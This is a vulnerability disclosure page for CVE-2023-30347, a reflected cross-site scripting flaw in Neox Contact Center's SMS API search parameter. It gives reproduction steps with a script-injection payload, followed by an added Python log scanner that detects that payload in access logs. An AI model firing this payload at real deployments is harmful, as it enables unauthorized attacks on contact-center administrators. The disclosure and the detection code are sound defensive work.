CVE-2023-30347: CVE-2023-30347/poc.txt at main · huzefa2212/CVE-2023-30347
Cross Site Scripting (XSS) vulnerability in Neox Contact Center 2.3.9, via the serach_sms_api_name parameter to the SMA API search.
Reflected Cross-Site Scripting in Neox Contact Center.
Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.
Steps to Reproduce:
1. Log in to Neox Contact Center as admin.
2. Visit the path https://neox.target.com/admin/admin.php?ADD=1&mode=serach&search_sms_api_name=Enter_Your_Payload_here
3. Payload "><script>alert(1)</script>
4. The payload will get executed.
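To check whether the request pattern above already appears in your web server logs, the following added example (not part of the original PoC or of Neox's code) flags requests to /admin/admin.php whose search parameter decodes to HTML metacharacters. It assumes combined-format access logs; the sample entries, function names and log layout are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Both spellings occur on the page (advisory text vs. PoC URL), so watch both.
PARAMS = ("search_sms_api_name", "serach_sms_api_name")
# Characters that let a reflected value close an attribute or open a tag.
BREAKOUT = re.compile(r"[<>\"']")
# Request target inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo leftover percent-encoding layers (proxies may re-encode), bounded."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_value(log_line):
    """Return the decoded parameter value if it carries markup, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.endswith("/admin/admin.php"):
        return None
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        if name not in PARAMS:
            continue
        for raw in values:  # parse_qs has already decoded one layer
            value = fully_decode(raw)
            if BREAKOUT.search(value):
                return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged entry."""
    found = ((n, suspicious_value(line)) for n, line in enumerate(lines, start=1))
    return [(n, value) for n, value in found if value is not None]

# Constructed sample entries (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/May/2023:10:00:01 +0000] "GET /admin/admin.php?ADD=1&mode=serach&search_sms_api_name=gateway1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/May/2023:10:02:13 +0000] "GET /admin/admin.php?ADD=1&mode=serach&search_sms_api_name=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5188',
    '203.0.113.9 - - [01/May/2023:10:02:40 +0000] "GET /admin/admin.php?ADD=1&mode=serach&search_sms_api_name=%2522%253E%253Cscript%253Ealert(1)%253C/script%253E HTTP/1.1" 200 5140',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: {value!r}")
```

A hit means the value was sent, not that it executed; confirm against the response body, and treat HTML-encoding the parameter on output as the actual fix.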